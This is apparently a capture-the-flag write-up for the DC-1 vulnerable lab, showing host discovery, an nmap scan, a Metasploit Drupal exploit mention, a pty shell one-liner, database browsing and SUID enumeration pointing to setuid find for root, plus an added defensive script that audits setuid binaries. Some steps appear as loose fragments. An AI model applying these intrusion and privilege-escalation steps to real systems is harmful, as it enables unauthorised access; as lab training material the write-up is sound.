# DC-1

Description
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

Write-up

```
hausa@debian:~$ fping -asg 172.16.100.1/24
172.16.100.1
172.16.100.129
```

Scan the open ports on 172.16.100.129:

```
hausa@debian:~$ nmap -Pn 172.16.100.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 10:26 EDT
Nmap scan report for 172.16.100.129
Host is up (0.49s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
Nmap done: 1 IP address (1 host up) scanned in 1.19 seconds
```

The site runs Drupal, a CMS, and an old version of it; Metasploit (msf) already has an exploit module for it.

cat flag1.txt
Every good CMS needs a config file – and so do you.

flag2 roughly says: apart from brute force, what other options do you have?

```
python -c "import pty;pty.spawn('/bin/bash')"
```

```
use drupaldb;
show tables;
```

output hash may be manually entered into the {users}.pass field to
change a password via SQL to a known value.

To execute this script this has to be the root directory of your
Drupal installation

Special PERMS will help FIND the passwd – but you’ll need to -exec that command to work out how to get what’s in the shadow.

SUID privilege escalation: when an `s` appears in the execute (x) position of the file owner's permissions, the program has the SUID special permission set.

```
www-data@DC-1:/var/www$ find /bin /sbin /usr/bin /usr/sbin -perm -4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/sbin/mount.nfs
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
```

The `find` command is in the list.
When running `find`, search for a file that actually exists, and avoid searching a directory; otherwise you get either no output or far too much of it.
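The defender-side counterpart of the listing above, added here as an example that is not part of the original write-up: it takes `find -perm -4000` output, compares it with a known-good baseline, and flags any setuid program that runs arbitrary commands for its caller (such as `find` with `-exec`). The baseline set is an assumption standing in for one built from a clean reference host, and the sample input is constructed from the listing in this write-up.

```python
#!/usr/bin/env python3
"""Audit the setuid binaries found on a host against a known-good baseline."""

# Assumed baseline: the setuid programs a stock Debian install ships with.
# Build yours from a clean reference host, never from the suspect machine.
BASELINE = {
    "/bin/mount", "/bin/ping", "/bin/ping6", "/bin/su", "/bin/umount",
    "/sbin/mount.nfs", "/usr/bin/at", "/usr/bin/chfn", "/usr/bin/chsh",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/passwd",
    "/usr/bin/procmail", "/usr/sbin/exim4",
}
# Programs that execute arbitrary commands for their caller (find via -exec):
# a setuid bit on any of these hands root to every local user.
COMMAND_RUNNERS = {"find"}

# Constructed sample: the write-up's `find -perm -4000` listing, including the
# echoed command line that a pty shell prints before the results.
SAMPLE_OUTPUT = "\n".join([
    "find /bin /sbin /usr/bin /usr/sbin -perm -4000",
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/ping6", "/bin/umount",
    "/sbin/mount.nfs", "/usr/bin/at", "/usr/bin/chsh", "/usr/bin/passwd",
    "/usr/bin/newgrp", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/procmail", "/usr/bin/find", "/usr/sbin/exim4",
])

def parse_find_output(text):
    """Keep only absolute paths; drops echoed commands and blank lines."""
    return [ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")]

def audit_suid(paths, baseline=BASELINE):
    """Return (not_in_baseline, command_runners), each sorted."""
    unexpected = sorted(p for p in paths if p not in baseline)
    dangerous = sorted(p for p in paths if p.rsplit("/", 1)[-1] in COMMAND_RUNNERS)
    return unexpected, dangerous

def remediation(paths):
    """Commands that clear the setuid bit on each flagged path."""
    return [f"chmod u-s {p}" for p in sorted(set(paths))]

if __name__ == "__main__":
    unexpected, dangerous = audit_suid(parse_find_output(SAMPLE_OUTPUT))
    for p in unexpected:
        print("setuid binary not in baseline:", p)
    for p in dangerous:
        print("setuid binary that runs arbitrary commands:", p)
    print("\n".join(remediation(unexpected + dangerous)))
```

To run it against a live host, feed the output of `find /bin /sbin /usr/bin /usr/sbin -perm -4000 -type f` into `parse_find_output` instead of the sample.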

Well done!!!!
Hopefully you’ve enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter – @DCAU7